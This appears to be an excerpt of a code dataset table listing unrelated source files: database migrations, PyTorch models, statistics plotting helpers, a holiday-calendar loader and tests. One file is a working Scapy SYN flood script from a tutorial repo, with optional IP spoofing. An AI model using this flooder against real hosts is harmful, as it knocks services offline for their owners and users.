| max_stars_repo_path (string, 4-245 chars) | max_stars_repo_name (string, 7-115 chars) | max_stars_count (int64, 101-368k) | id (string, 2-8 chars) | content (string, 6-1.03M chars) |
|---|---|---|---|---|
libweasyl/libweasyl/alembic/versions/f9226a83bbb6_remove_dead_ads_table.py | akash143143/weasyl | 111 | 61186 |
"""Remove dead ads table
Revision ID: <KEY>
Revises: 1307b62614a4
Create Date: 2020-02-27 23:14:41.314000
"""
# revision identifiers, used by Alembic.
revision = '<KEY>'
down_revision = '1307b62614a4'
from alembic import op # lgtm[py/unused-import]
import sqlalchemy as sa # lgtm[py/unused-import]
from sqlalchemy.dialects import postgresql
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index('ind_ads_end', table_name='ads')
op.drop_table('ads')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('ads',
sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),
sa.Column('owner', sa.VARCHAR(length=254), autoincrement=False, nullable=False),
sa.Column('link_target', sa.TEXT(), autoincrement=False, nullable=False),
sa.Column('file', sa.INTEGER(), autoincrement=False, nullable=False),
sa.Column('start', postgresql.TIMESTAMP(), autoincrement=False, nullable=True),
sa.Column('end', postgresql.TIMESTAMP(), autoincrement=False, nullable=True),
sa.ForeignKeyConstraint(['file'], [u'media.mediaid'], name=u'ads_file_fkey', onupdate=u'CASCADE', ondelete=u'CASCADE'),
sa.PrimaryKeyConstraint('id', name=u'ads_pkey')
)
op.create_index('ind_ads_end', 'ads', ['end'], unique=False)
# ### end Alembic commands ###
|
test/testdata/malformed.py | Scartography/mapchete | 161 | 61209 |
# contains neither Process object nor execute() function
|
report_builder_scheduled/migrations/0002_auto_20180413_0747.py | nazmizorlu/django-report-builder | 560 | 61224 |
# Generated by Django 2.0.4 on 2018-04-13 07:47
from django.conf import settings
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('report_builder_scheduled', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='scheduledreport',
name='last_run_at',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
migrations.AlterField(
model_name='scheduledreport',
name='users',
field=models.ManyToManyField(blank=True, help_text='Staff users to notify', limit_choices_to={'is_staff': True}, to=settings.AUTH_USER_MODEL),
),
]
|
lav/models/rgb.py | Kin-Zhang/LAV | 122 | 61247 |
import torch
from torch import nn
from torch.nn import functional as F
from .resnet import resnet18, resnet34
from .segmentation import SegmentationHead
from .attention import Attention
from .erfnet import ERFNet
class Normalize(nn.Module):
""" ImageNet normalization """
def __init__(self, mean, std):
super().__init__()
self.mean = nn.Parameter(torch.tensor(mean), requires_grad=False)
self.std = nn.Parameter(torch.tensor(std), requires_grad=False)
def forward(self, x):
return (x - self.mean[None,:,None,None]) / self.std[None,:,None,None]
class RGBModel(nn.Module):
def __init__(self, seg_channels, pretrained=True):
super().__init__()
self.num_channels = len(seg_channels)
self.backbone = resnet18(pretrained=pretrained)
self.normalize = Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
self.head = None
def forward(self, rgb):
embd = self.backbone(self.normalize(rgb/255.))
return self.head(embd).squeeze(-1)
class RGBSegmentationModel(nn.Module):
def __init__(self, seg_channels):
super().__init__()
self.erfnet = ERFNet(len(seg_channels)+1)
self.normalize = lambda x: (x/255.-.5)*2
def forward(self, rgb):
return self.erfnet(self.normalize(rgb))
class RGBBrakePredictionModel(nn.Module):
def __init__(self, seg_channels, pretrained=True):
super().__init__()
self.conv_backbone = resnet18(pretrained=pretrained)
self.normalize = Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
self.seg_head = SegmentationHead(512, len(seg_channels)+1)
self.classifier = nn.Sequential(
nn.Linear(1024,1),
nn.Sigmoid()
)
def forward(self, rgb1, rgb2, mask=False):
x1 = self.conv_backbone(self.normalize(rgb1/255.))
x2 = self.conv_backbone(self.normalize(rgb2/255.))
h1 = x1.mean(dim=[2,3])
h2 = x2.mean(dim=[2,3])
pred_bra = self.classifier(torch.cat([h1,h2], dim=1))
if mask:
pred_sem1 = F.interpolate(self.seg_head(x1), scale_factor=4)
pred_sem2 = F.interpolate(self.seg_head(x2), scale_factor=4)
return pred_bra[:,0], pred_sem1, pred_sem2
else:
return pred_bra[:,0]
|
Validation/RecoB/python/bTagAnalysis_harvesting_cfi.py | ckamtsikis/cmssw | 852 | 61273 |
import FWCore.ParameterSet.Config as cms
# BTagPerformanceAnalyzer configuration
from Validation.RecoB.bTagAnalysis_cfi import *
bTagValidationHarvest = bTagHarvestMC.clone()
from DQMOffline.RecoB.bTagAnalysisData_cfi import *
bTagValidationHarvestData = bTagHarvest.clone()
|
scapy/syn-flood/syn_flood.py | caesarcc/python-code-tutorials | 1,059 | 61294 |
from scapy.all import *
import argparse
parser = argparse.ArgumentParser(description="Simple SYN Flood Script")
parser.add_argument("target_ip", help="Target IP address (e.g router's IP)")
parser.add_argument("-p", "--port", help="Destination port (the port of the target's machine service, \
e.g 80 for HTTP, 22 for SSH and so on).")
# parse arguments from the command line
args = parser.parse_args()
# target IP address (should be a testing router/firewall)
target_ip = args.target_ip
# the target port you want to flood
target_port = args.port
# forge IP packet with target ip as the destination IP address
ip = IP(dst=target_ip)
# or if you want to perform IP Spoofing (will work as well)
# ip = IP(src=RandIP("192.168.1.1/24"), dst=target_ip)
# forge a TCP SYN packet with a random source port
# and the target port as the destination port
tcp = TCP(sport=RandShort(), dport=target_port, flags="S")
# add some flooding data (1KB in this case, don't increase it too much,
# otherwise, it won't work.)
raw = Raw(b"X"*1024)
# stack up the layers
p = ip / tcp / raw
# send the constructed packet in a loop until CTRL+C is detected
send(p, loop=1, verbose=0)
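# Illustrative invocation added for clarity (not part of the original script);
# the IP address and port below are placeholders for a machine you are allowed to test:
#   python syn_flood.py 192.168.1.1 -p 80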
|
Python/data_exchange.py | PushpneetSingh/Hello-world | 1,428 | 61318 |
<filename>Python/data_exchange.py
a = 1
b = 2
print('a = ' + str(a) + ',' + 'b = ' + str(b))
temp = a
a = b
b = temp
print('a = ' + str(a) + ',' + 'b = ' + str(b))
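# Note added for clarity (not in the original script): Python can swap two names
# without a temporary variable using tuple unpacking:
#   a, b = b, a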
|
visualize_ML/relation.py | weme123/visualize_ML | 195 | 61349 |
import pandas as pd
import numpy as np
from numpy import corrcoef
import matplotlib.pyplot as plt
from sklearn.feature_selection import chi2
from sklearn.feature_selection import f_classif
from math import *
plt.style.use('ggplot')
fig = plt.figure()
COUNTER = 1
#Return the category dictionary, categorical variables list and continuous variables list for every column in the dataframe.
#The categories are assigned as "target(type)_feature(type)"
def get_category(df,target_name,categorical_name,columns_name):
cat_dict = {}
fin_cat_dict = {}
catg_catg = []
cont_cont = []
catg_cont = []
cont_catg = []
for col in columns_name:
if len(df[col].unique())<=2:
cat_dict[col] = "categorical"
elif col in categorical_name:
cat_dict[col] = "categorical"
else:
cat_dict[col] = "continous"
for col in cat_dict:
if cat_dict[col]=="categorical" and cat_dict[target_name]=="categorical":
fin_cat_dict[col] = "catg_catg"
catg_catg.append(col)
elif cat_dict[col]=="continous" and cat_dict[target_name]=="continous":
fin_cat_dict[col] = "cont_cont"
cont_cont.append(col)
elif cat_dict[col]=="continous" and cat_dict[target_name]=="categorical":
fin_cat_dict[col] = "catg_cont"
catg_cont.append(col)
else:
fin_cat_dict[col] = "cont_catg"
cont_catg.append(col)
return fin_cat_dict,catg_catg,cont_cont,catg_cont,cont_catg
#Return True if the categorical_name entries are present in the original dataframe columns.
def is_present(columns_name,categorical_name):
ls = [i for i in categorical_name if i not in columns_name]
if len(ls)==0:
return True
else:
raise ValueError(str(ls)+" is not present as a column in the data, please check the name")
#Function returns list of columns with non-numeric data.
def clean_str_list(df,lst):
rem=[]
for i in lst:
res = any(isinstance(n,str) for n in df[i])
if res == True:
rem.append(i)
for j in rem:
lst.remove(j)
return lst
#Returns the Pearson correlation coefficient for the continuous data columns.
def pearson_correlation_cont_cont(x,y):
return corrcoef(x,y)
# This function is for the bivariate analysis between two continuous variables. Plots scatter plots and shows the correlation coefficient for the data.
def bivariate_analysis_cont_cont(cont_cont_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE):
clean_cont_cont_list = clean_str_list(df,cont_cont_list)
if len(clean_str_list(df,[target_name])) == 0 and len(cont_cont_list)>0:
raise ValueError("You seem to have a target variable with string values.")
clean_df = df.dropna()
for col in clean_cont_cont_list:
summary = clean_df[col].describe()
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = clean_df[col]
y = np.float32(clean_df[target_name])
corr = pearson_correlation_cont_cont(x,y)
plt.xlabel(col+"\n count "+str(count)+"\n Corr: "+str(np.float32(corr[0][1])), fontsize=10)
plt.ylabel(target_name, fontsize=10)
plt.scatter(x,y)
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
return plt,COUNTER
#The chi-square test is used to see the association between categorical vs categorical variables.
#Lower p-values are significant; they should be < 0.05
#chi-square value = X^2 = summation [(observed-expected)^2/expected]
# The distribution of the statistic X^2 is chi-square with (r-1)(c-1) degrees of freedom, where r represents the number of rows in the two-way table and c represents the number of columns. The distribution is denoted X^2(df), where df is the number of degrees of freedom.
#p-value = P(X^2(df) >= observed X^2)
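# Illustrative sketch added for clarity (not part of the original module): the
# chi-square formula from the comment above, computed by hand for a contingency
# table of observed counts. The helper name is hypothetical; evaluate_chi below
# delegates to sklearn's chi2 instead of using this.
def _chi_square_by_hand(observed):
    """observed: 2-D array of counts (rows = feature classes, cols = target classes)."""
    observed = np.asarray(observed, dtype=float)
    row_tot = observed.sum(axis=1, keepdims=True)
    col_tot = observed.sum(axis=0, keepdims=True)
    expected = row_tot * col_tot / observed.sum()            # expected counts under independence
    chi_sq = ((observed - expected) ** 2 / expected).sum()   # summation [(observed-expected)^2/expected]
    dof = (observed.shape[0] - 1) * (observed.shape[1] - 1)  # (r-1)(c-1) degrees of freedom
    return chi_sq, dof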
def evaluate_chi(x,y):
chi,p_val = chi2(x,y)
return chi,p_val
def bivariate_analysis_catg_catg(catg_catg_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,bin_size="auto"):
clean_catg_catg_list = clean_str_list(df,catg_catg_list)
clean_df = df.dropna()
target_classes =df[target_name].unique()
label = [str(i) for i in target_classes]
c = 0
for col in clean_catg_catg_list:
summary = clean_df[col].describe()
binwidth = 0.7
if bin_size == 'auto':
bins_size =np.arange(min(clean_df[col].tolist()), max(clean_df[col].tolist()) + binwidth, binwidth)
else:
bins_size = bin_size
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = [np.array(clean_df[clean_df[target_name]==i][col]) for i in target_classes]
y = clean_df[target_name]
chi,p_val = evaluate_chi(np.array(clean_df[col]).reshape(-1,1),y)
plt.xlabel(col+"\n chi: "+str(np.float32(chi[0]))+" / p_val: "+str(p_val[0]), fontsize=10)
plt.ylabel("Frequency", fontsize=10)
plt.hist(x,bins=bins_size,stacked=True,label = label)
plt.legend(prop={'size': 10})
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
c+=1
return plt,COUNTER
# Analysis of variance (ANOVA) is a collection of statistical models used to analyze the differences among group means and their associated procedures (such as "variation" among and between groups)
# In its simplest form, ANOVA provides a statistical test of whether or not the means of several groups are equal, and therefore generalizes the t-test to more than two groups. ANOVAs are useful for comparing (testing) three or more means (groups or variables) for statistical significance.
# A one-way ANOVA is used to compare the means of more than two independent groups. A one-way ANOVA comparing just two groups will give you the same results as the independent t test.
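# Illustrative sketch added for clarity (not part of the original module): the one-way
# ANOVA F statistic described above, computed from per-group samples by hand. The
# helper name is hypothetical; evaluate_anova below delegates to sklearn's f_classif.
def _anova_f_by_hand(groups):
    """groups: list of 1-D arrays of observations, one array per group."""
    groups = [np.asarray(g, dtype=float) for g in groups]
    all_values = np.concatenate(groups)
    grand_mean = all_values.mean()
    k, n_total = len(groups), all_values.size
    ss_between = sum(g.size * (g.mean() - grand_mean) ** 2 for g in groups)  # variation between group means
    ss_within = sum(((g - g.mean()) ** 2).sum() for g in groups)             # variation inside each group
    return (ss_between / (k - 1)) / (ss_within / (n_total - k))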
def evaluate_anova(x,y):
F_value,pvalue = f_classif(x,y)
return F_value,pvalue
# In descriptive statistics, a box plot or boxplot is a convenient way of graphically depicting groups of numerical data through their quartiles. Box plots may also have lines extending vertically from the boxes (whiskers) indicating variability outside the upper and lower quartiles, hence the terms box-and-whisker plot and box-and-whisker diagram.
# Quartile: In descriptive statistics, the quartiles of a ranked set of data values are the three points that divide the data set into four equal groups, each group comprising a quarter of the data
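# Illustrative note added for clarity (not part of the original module): the three
# quartiles described above can be computed with numpy, e.g.
# np.percentile(values, [25, 50, 75]) gives Q1, the median and Q3 that plt.boxplot draws.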
def bivariate_analysis_cont_catg(cont_catg_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE):
clean_cont_catg_list = clean_str_list(df,cont_catg_list)
if len(clean_str_list(df,[target_name])) == 0 and len(cont_catg_list)>0:
raise ValueError("You seem to have a target variable with string values.")
clean_df = df.dropna()
for col in clean_cont_catg_list:
col_classes =clean_df[col].unique()
summary = clean_df[col].describe()
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = [np.array(clean_df[clean_df[col]==i][target_name]) for i in col_classes]
y = np.float32(clean_df[target_name])
f_value,p_val = evaluate_anova(np.array(clean_df[col]).reshape(-1,1),y)
plt.xlabel(col+"\n f_value: "+str(np.float32(f_value[0]))+" / p_val: "+str(p_val[0]), fontsize=10)
plt.ylabel(target_name, fontsize=10)
plt.boxplot(x)
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
return plt,COUNTER
# This function is for the bivariate analysis between categorical vs continuous variables. Plots box plots.
def bivariate_analysis_catg_cont(catg_cont_list,df,target_name,sub_len,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE):
# No need to remove string variables as they are handled by the chi2 function of sklearn.
# clean_catg_cont_list = clean_str_list(df,catg_cont_list)
clean_catg_cont_list = catg_cont_list
clean_df = df.dropna()
for col in clean_catg_cont_list:
col_classes =df[target_name].unique()
summary = clean_df[col].describe()
count = summary[0]
mean = summary[1]
std = summary[2]
plt.subplot(PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,COUNTER)
plt.title("mean "+str(np.float32(mean))+" std "+str(np.float32(std)),fontsize=10)
x = [np.array(clean_df[clean_df[target_name]==i][col]) for i in col_classes]
y = clean_df[target_name]
f_value,p_val = evaluate_anova(np.array(clean_df[col]).reshape(-1,1),y)
plt.xlabel(target_name+"\n f_value: "+str(np.float32(f_value[0]))+" / p_val: "+str(p_val[0]), fontsize=10)
plt.ylabel(col, fontsize=10)
plt.boxplot(x)
print (col+" vs "+target_name+" plotted....")
COUNTER +=1
return plt,COUNTER
#returns the total number of subplots to be made.
def total_subplots(df,lst):
clean_df = df.dropna()
total = [len(clean_str_list(clean_df,i)) for i in lst]
return sum(total)
# This function returns a new categorical list after removing drop values, in case they appear in both the drop and categorical_name lists.
def remove_drop_from_catglist(drop,categorical_name):
for col in drop:
if col in categorical_name:
categorical_name.remove(col)
return categorical_name
def plot(data_input,target_name="",categorical_name=[],drop=[],PLOT_COLUMNS_SIZE = 4,bin_size="auto",wspace=0.5,hspace=0.8):
"""
This is the main function that gives the bivariate analysis between the target variable and the input features.
Parameters
-----------
data_input : Dataframe
This is the input Dataframe with all data.
target_name : String
The name of the target column.
categorical_name : list
Names of all categorical variable columns with more than 2 classes, to distinguish them from the continuous variables.
drop : list
Names of columns to be dropped.
PLOT_COLUMNS_SIZE : int
Number of plots to display per row in the display window. The row count is adjusted accordingly.
bin_size : int ;default="auto"
Number of bins for the histogram displayed in the categorical vs categorical category.
wspace : float ;default = 0.5
Horizontal padding between subplots in the display window.
hspace : float ;default = 0.8
Vertical padding between subplots in the display window.
-----------
"""
if type(data_input).__name__ == "DataFrame" :
# Column names
columns_name = data_input.columns.values
#To drop user specified columns.
if is_present(columns_name,drop):
data_input = data_input.drop(drop,axis=1)
columns_name = data_input.columns.values
categorical_name = remove_drop_from_catglist(drop,categorical_name)
else:
raise ValueError("Couldn't find it in the input Dataframe!")
if target_name == "":
raise ValueError("Please mention a target variable")
#Checks if the categorical_name entries are present in the original dataframe columns.
categorical_is_present = is_present(columns_name,categorical_name)
target_is_present = is_present(columns_name,[target_name])
if categorical_is_present:
fin_cat_dict,catg_catg_list,cont_cont_list,catg_cont_list,cont_catg_list = get_category(data_input,target_name,categorical_name,columns_name)
#Subplot(Total number of graphs)
total = total_subplots(data_input,[cont_cont_list,catg_catg_list,catg_cont_list,cont_catg_list])
if total < PLOT_COLUMNS_SIZE:
total = PLOT_COLUMNS_SIZE
PLOT_ROW_SIZE = ceil(float(total)/PLOT_COLUMNS_SIZE)
#Call various functions
plot,count = bivariate_analysis_cont_cont(cont_cont_list,data_input,target_name,total,COUNTER,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE)
plot,count = bivariate_analysis_catg_catg(catg_catg_list,data_input,target_name,total,count,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE,bin_size=bin_size)
plot,count = bivariate_analysis_cont_catg(cont_catg_list,data_input,target_name,total,count,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE)
plot,count = bivariate_analysis_catg_cont(catg_cont_list,data_input,target_name,total,count,PLOT_ROW_SIZE,PLOT_COLUMNS_SIZE)
fig.subplots_adjust(bottom=0.08,left = 0.05,right=0.97,top=0.93,wspace = wspace,hspace = hspace)
plot.show()
else:
raise ValueError("Make sure input data is a Dataframe.")
|
engineer/utils/gallery.py | lingtengqiu/Open-PIFuhd | 191 | 61356 |
import os
import numpy as np
def save_samples_truncted_prob(fname, points, prob):
'''
Save the visualization of sampling to a ply file.
Red points represent positive predictions.
Green points represent negative predictions.
Parameters
fname: File name to save
points: [N, 3] array of points
prob: [1, N] array of predictions in the range [0~1]
Return:
None
'''
prob = prob.transpose(0, 1).detach().numpy()
r = (prob > 0.5).reshape([-1, 1]) * 255
g = (prob < 0.5).reshape([-1, 1]) * 255
b = np.zeros(r.shape)
to_save = np.concatenate([points, r, g, b,prob], axis=-1)
return np.savetxt(fname,
to_save,
fmt='%.6f %.6f %.6f %d %d %d %.6f',
comments='',
header=(
'ply\nformat ascii 1.0\nelement vertex {:d}\nproperty float x\nproperty float y\nproperty float z\nproperty uchar red\nproperty uchar green\nproperty uchar blue\nproperty float prob\nend_header').format(
points.shape[0])
)
def save_gallery(preds,samples,names,gallery_id,epoch):
pred = preds[0].cpu()
sample = samples[0].transpose(0, 1).cpu()
name = names[0]
save_gallery_path = os.path.join(gallery_id,name.split('/')[-2],"epoch_{:03d}".format(epoch))
os.makedirs(save_gallery_path,exist_ok=True)
path = os.path.join(save_gallery_path,'pred.ply')
save_samples_truncted_prob(path,sample,pred)
|
exchange_rates/cbr_ru_parse.py | gil9red/SimplePyScripts | 117 | 61409 |
<reponame>gil9red/SimplePyScripts
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
"""Парсер курса доллара и евро за текущую дату от сайта центробанка России."""
import sys
from datetime import date
# pip install robobrowser
from robobrowser import RoboBrowser
date_req = date.today().strftime('%d.%m.%Y')
url = 'http://www.cbr.ru/scripts/XML_daily.asp?date_req=' + date_req
browser = RoboBrowser(
user_agent='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
parser='html.parser'
)
browser.open(url)
rs = browser.response
if not rs.ok:
print(rs.status_code, rs.reason)
sys.exit()
for valute_el in browser.select('Valute'):
char_code = valute_el.select_one('CharCode').get_text(strip=True)
value = valute_el.select_one('Value').get_text(strip=True)
if char_code in ['USD', 'EUR']:
print(char_code, value)
|
tests/unit/butterfree/extract/pre_processing/test_explode_json_column.py | fossabot/butterfree | 208 | 61464 |
from pyspark.sql.types import (
ArrayType,
IntegerType,
StringType,
StructField,
StructType,
)
from butterfree.extract.pre_processing import explode_json_column
from butterfree.testing.dataframe import (
assert_dataframe_equality,
create_df_from_collection,
)
def test_explode_json_column(spark_context, spark_session):
# arrange
input_data = [{"json_column": '{"a": 123, "b": "abc", "c": "123", "d": [1, 2, 3]}'}]
target_data = [
{
"json_column": '{"a": 123, "b": "abc", "c": "123", "d": [1, 2, 3]}',
"a": 123,
"b": "abc",
"c": 123,
"d": [1, 2, 3],
}
]
input_df = create_df_from_collection(input_data, spark_context, spark_session)
target_df = create_df_from_collection(target_data, spark_context, spark_session)
json_column_schema = StructType(
[
StructField("a", IntegerType()),
StructField("b", StringType()),
StructField("c", IntegerType()),
StructField("d", ArrayType(IntegerType())),
]
)
# act
output_df = explode_json_column(input_df, "json_column", json_column_schema)
# assert
assert_dataframe_equality(target_df, output_df)
|
ui/file_manager/video_player/js/cast/compiled_resources2.gyp | google-ar/chromium | 777 | 61477 |
<filename>ui/file_manager/video_player/js/cast/compiled_resources2.gyp
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'targets': [
# {
# 'target_name': 'cast_extension_discoverer',
# 'includes': ['../../../compile_js2.gypi'],
# },
# {
# 'target_name': 'cast_video_element',
# 'includes': ['../../../compile_js2.gypi'],
# },
# {
# 'target_name': 'caster',
# 'includes': ['../../../compile_js2.gypi'],
# },
# {
# 'target_name': 'media_manager',
# 'includes': ['../../../compile_js2.gypi'],
# },
],
}
|
backend/resources/calendar.py | sleepingAnt/viewfinder | 645 | 61486 |
<reponame>sleepingAnt/viewfinder
# Copyright 2012 Viewfinder Inc. All Rights Reserved.
"""Calendar datamodel.
Calendars provide color to a chronology such as the Viewfinder search/
browse tool.
Calendars are parsed from the "resources/calendars/" subdirectory on
demand and cached.
TODO(spencer): this is a very rough beginning meant to capture
locale-specific holidays. We use here the holiday calendars provided
by Mozilla. The idea in general is to provide an interface to
arbitrary calendars, such as the wealth of calendars available via
Google's calendar app.
"""
__author__ = '<EMAIL> (<NAME>)'
import datetime
import dateutil
import logging
import os
import time
import vobject
from functools import partial
from viewfinder.backend.base import util
class Calendar(object):
"""Interface to loading ICS iCalendar calendar data."""
_RESOURCES_CALENDARS_FMT = '../../resources/calendars/%s'
_DEFAULT_CALENDAR_ID = 'USHolidays.ics'
"""Mapping from locale to holidays calendar."""
_locale_to_holiday_calendar_map = {
'ar_DZ': 'AlgeriaHolidays.ics',
'es_AR': 'ArgentinaHolidays.ics',
'en_AU': 'AustraliaHolidays.ics',
'de_AT': 'AustrianHolidays.ics',
'eu_ES': 'BasqueHolidays.ics',
'nl_BE': 'BelgianDutchHolidays.ics',
'fr_BE': 'BelgianFrenchHolidays.ics',
'de_BE': 'BelgianHolidays.ics',
'es_BO': 'BoliviaHolidays.ics',
'pt_BR': 'BrazilHolidays.ics',
'bg_BG': 'BulgarianHolidays.ics',
'en_CA': 'CanadaHolidays.ics',
'es_CL': 'ChileHolidays.ics',
'zh_CN': 'ChinaHolidays.ics',
'es_CO': 'ColombianHolidays.ics',
'hr_HR': 'CroatiaHolidays.ics',
'cs_CZ': 'CzechHolidays.ics',
'da_DK': 'DanishHolidays.ics',
'be_NL': 'DutchHolidays.ics',
'nl_NL': 'DutchHolidays.ics',
'en_GB': 'EnglishHolidays.ics',
'et_EE': 'EstoniaHolidays.ics',
'fi_FI': 'FinlandHolidays.ics',
'sv_FI': 'FinlandHolidays.ics',
'fr_FR': 'FrenchHolidays.ics',
'fy_NL': 'FrisianHolidays.ics',
'de_DE': 'GermanHolidays.ics',
'en_HK': 'HongKongHolidays.ics',
'zh_HK': 'HongKongHolidays.ics',
'hu_HU': 'HungarianHolidays.ics',
'is_IS': 'IcelandHolidays.ics',
'id_ID': 'IndonesianHolidays.ics',
'it_IT': 'ItalianHolidays.ics',
'ja_JP': 'JapanHolidays.ics',
'sw_KE': 'KenyaHolidays.ics',
'so_KE': 'KenyaHolidays.ics',
'om_KE': 'KenyaHolidays.ics',
'kam_KE': 'KenyaHolidays.ics',
'lv_LV': 'LatviaHolidays.ics',
'lt_LT': 'LithuanianHolidays.ics',
'de_LU': 'LuxembourgHolidays.ics',
'fr_LU': 'LuxembourgHolidays.ics',
'en_NZ': 'NewZealandHolidays.ics',
'mi_NZ': 'NewZealandHolidays.ics',
'nb_NO': 'NorwegianHolidays.ics',
'en_PK': 'PakistanHolidays.ics',
'pa_Arab_PK': 'PakistanHolidays.ics',
'pa_PK': 'PakistanHolidays.ics',
'ur_PK': 'PakistanHolidays.ics',
'es_PE': 'PeruHolidays.ics',
'pl_PL': 'PolishHolidays.ics',
'pt_PT': 'PortugalHolidays.ics',
'en_QLD': 'QueenslandHolidays.ics',
'en_AU_QLD': 'QueenslandHolidays.ics',
'ro_MD': 'RomaniaHolidays.ics',
'ro_RO': 'RomaniaHolidays.ics',
'ru_RU': 'RussiaHolidays.ics',
'ru_UA': 'RussiaHolidays.ics',
'uk_UA': 'RussiaHolidays.ics',
'en_SG': 'SingaporeHolidays.ics',
'zh_Hans_SG': 'SingaporeHolidays.ics',
'zh_SG': 'SingaporeHolidays.ics',
'sk_SK': 'SlovakHolidays.ics',
'af_ZA': 'SouthAfricaHolidays.ics',
'en_ZA': 'SouthAfricaHolidays.ics',
'nr_ZA': 'SouthAfricaHolidays.ics',
'nso_ZA': 'SouthAfricaHolidays.ics',
'ss_ZA': 'SouthAfricaHolidays.ics',
'st_ZA': 'SouthAfricaHolidays.ics',
'tn_ZA': 'SouthAfricaHolidays.ics',
'ts_ZA': 'SouthAfricaHolidays.ics',
've_ZA': 'SouthAfricaHolidays.ics',
'xh_ZA': 'SouthAfricaHolidays.ics',
'zu_ZA': 'SouthAfricaHolidays.ics',
'ko_KR': 'SouthKoreaHolidays.ics',
'es_ES': 'SpanishHolidays.ics',
'si_LK': 'SriLankaHolidays.ics',
'sv_SE': 'SwedishHolidays.ics',
'de_CH': 'SwissHolidays.ics',
'fr_CH': 'SwissHolidays.ics',
'gsw_CH': 'SwissHolidays.ics',
'it_CH': 'SwissHolidays.ics',
'trv_TW': 'TaiwanHolidays.ics',
'zh_Hant_TW': 'TaiwanHolidays.ics',
'zh_TW': 'TaiwanHolidays.ics',
'th_TH': 'ThaiHolidays.ics',
'ku_Latn_TR': 'TurkeyHolidays.ics',
'ku_TR': 'TurkeyHolidays.ics',
'tr_TR': 'TurkeyHolidays.ics',
'cy_GB': 'UKHolidays.ics',
'en_GB': 'UKHolidays.ics',
'gv_GB': 'UKHolidays.ics',
'kw_GB': 'UKHolidays.ics',
'en': 'USHolidays.ics',
'en_US': 'USHolidays.ics',
'es_US': 'USHolidays.ics',
'haw_US': 'USHolidays.ics',
'es_UY': 'UruguayHolidays.ics',
'vi_VN': 'VietnamHolidays.ics',
}
"""Cache for Calendar objects."""
_cache = dict()
def __init__(self, calendar_id):
"""Prepares a calendar for the specified 'calendar_id'.
"""
self.calendar_id = calendar_id
cal_path = os.path.dirname(__file__)
path = os.path.join(cal_path, Calendar._RESOURCES_CALENDARS_FMT % self.calendar_id)
with open(path, 'rb') as f:
self._cal = vobject.readOne(f)
def GetEvents(self, year):
"""Returns the events from the calendar for the year specified.
In cases where the calendar does not span the requested year,
throws a 'NoCalendarDataError' exception.
"""
events = []
for event in self._cal.components():
if event.name == 'VEVENT':
name = event.summary.value
if event.getrruleset():
rruleset = event.getrruleset()
dates = rruleset.between(datetime.datetime(year - 1, 12, 31),
datetime.datetime(year + 1, 1, 1))
if len(dates) >= 1:
if len(dates) > 1:
logging.warning('holiday %s occurs more than once a year: %r' % (name, dates))
delta = event.dtend.value - event.dtstart.value
dtstart = dates[0]
dtend = dtstart + delta
events.append({'name': name,
'dtstart': time.mktime(dtstart.timetuple()),
'dtend': time.mktime(dtend.timetuple())})
else:
dtstart = event.dtstart.value
dtend = event.dtend.value
if dtstart.year == year:
events.append({'name': name,
'dtstart': time.mktime(dtstart.timetuple()),
'dtend': time.mktime(dtend.timetuple())})
return events
@classmethod
def GetCalendar(cls, calendar_id=None):
"""Attempts to locate a cached version of 'calendar_id'. If none is
found, attempts to load from disk.
"""
calendar_id = calendar_id or Calendar._DEFAULT_CALENDAR_ID
if not Calendar._cache.has_key(calendar_id):
cal = Calendar(calendar_id)
Calendar._cache[calendar_id] = cal
return Calendar._cache[calendar_id]
@classmethod
def GetHolidaysByLocale(cls, locale='en_US'):
"""Attempts to match the specified locale with a holidays
calendar. Normalizes the locale by replacing '-' with '_'.
"""
locale = locale.replace('-', '_')
calendar_id = Calendar._locale_to_holiday_calendar_map.get(locale, None) or \
Calendar._DEFAULT_CALENDAR_ID
return Calendar.GetCalendar(calendar_id)
|
roles/openshift_health_checker/test/aos_version_test.py | shgriffi/openshift-ansible | 164 | 61554 |
import pytest
import aos_version
from collections import namedtuple
Package = namedtuple('Package', ['name', 'version'])
expected_pkgs = {
"spam": {
"name": "spam",
"version": "3.2.1",
"check_multi": False,
},
"eggs": {
"name": "eggs",
"version": "3.2.1",
"check_multi": False,
},
}
@pytest.mark.parametrize('pkgs,expected_pkgs_dict', [
(
# all found
[Package('spam', '3.2.1'), Package('eggs', '3.2.1')],
expected_pkgs,
),
(
# found with more specific version
